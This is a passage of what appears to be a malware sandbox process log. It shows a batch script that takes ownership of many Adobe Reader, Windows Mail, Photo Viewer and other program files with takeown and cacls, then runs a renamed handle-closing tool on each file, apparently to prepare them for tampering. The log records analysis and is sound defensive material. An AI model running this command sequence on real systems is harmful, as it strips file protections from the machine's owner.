C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "engphon.env" -nobanner3⤵PID:872
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "engphon.env" -nobanner4⤵PID:1672
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:208
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:1020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:1460
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:316
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:932
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:2020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵
- Modifies file permissions
PID:912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:336
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:1352
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵PID:1728
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT" /E /G Admin:F /C3⤵PID:1804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT"3⤵PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CP1254.TXT" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CP1254.TXT" -nobanner4⤵PID:1672
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:792
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:1236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵PID:268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "RTC.der" -nobanner3⤵PID:1640
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "RTC.der" -nobanner4⤵PID:1064
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1664
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵PID:1816
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C3⤵PID:1600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"3⤵
- Modifies file permissions
PID:1796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "email_initiator.gif" -nobanner3⤵PID:1580
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "email_initiator.gif" -nobanner4⤵PID:336
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:1804
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵
- Modifies file permissions
PID:1288
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "main.css" -nobanner3⤵PID:1848
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "main.css" -nobanner4⤵PID:1948
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C3⤵PID:788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"3⤵
- Modifies file permissions
PID:820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "review_email.gif" -nobanner3⤵PID:1444
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "review_email.gif" -nobanner4⤵PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1940
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵PID:652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C3⤵PID:1600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"3⤵
- Modifies file permissions
PID:1048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "submission_history.gif" -nobanner3⤵PID:1132
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "submission_history.gif" -nobanner4⤵PID:1352
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:1628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵PID:872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "warning.gif" -nobanner3⤵PID:1484
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "warning.gif" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1728
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C3⤵PID:1480
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"3⤵
- Modifies file permissions
PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CourierStd.otf" -nobanner3⤵PID:516
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CourierStd.otf" -nobanner4⤵PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1616
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵PID:220
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf" /E /G Admin:F /C3⤵PID:1600
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf"3⤵
- Modifies file permissions
PID:1048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "MyriadPro-Regular.otf" -nobanner3⤵PID:1428
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "MyriadPro-Regular.otf" -nobanner4⤵PID:1352
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵PID:652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C3⤵PID:1944
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"3⤵PID:872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵PID:1040
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner4⤵PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵PID:1652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵PID:1064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "brt32.clx" -nobanner3⤵PID:1236
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "brt32.clx" -nobanner4⤵PID:316
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:1880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:1268
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "eng32.clx" -nobanner3⤵PID:1132
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "eng32.clx" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵PID:292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C3⤵PID:1288
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "symbol.txt" -nobanner3⤵PID:1548
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "symbol.txt" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵PID:1804
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C3⤵PID:788
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"3⤵
- Modifies file permissions
PID:1064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ROMAN.TXT" -nobanner3⤵PID:516
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ROMAN.TXT" -nobanner4⤵PID:316
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵PID:1652
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C3⤵PID:912
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"3⤵PID:336
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "CP1253.TXT" -nobanner3⤵PID:520
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "CP1253.TXT" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1880
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1628
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1040
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:292
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
PID:1064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:1444
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:516
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:1428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵PID:1132
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵PID:1164
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:932
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵PID:224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1768
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:1388
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1940
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1444
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:860
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:1824
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:208
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"3⤵PID:520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:612
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1164
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:912
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:936
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "directories.acrodata" -nobanner3⤵PID:652
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "directories.acrodata" -nobanner4⤵PID:792
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe""2⤵PID:1628
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe" /E /G Admin:F /C3⤵PID:1528
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe"3⤵PID:1916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "GoogleUpdateSetup.exe" -nobanner3⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "GoogleUpdateSetup.exe" -nobanner4⤵PID:1444
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""2⤵PID:820
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:1440
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"3⤵PID:324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "wab.exe" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "wab.exe" -nobanner4⤵PID:232
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:236
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:1428
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵PID:1040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c WSBgHpvp.exe -accepteula "WinMail.exe" -nobanner3⤵PID:1796
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula "WinMail.exe" -nobanner4⤵PID:792
-
-
-
C:\Users\Admin\AppData\Local\Temp\WSBgHpvp.exeWSBgHpvp.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\dK7VamHD.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵PID:516
-
-
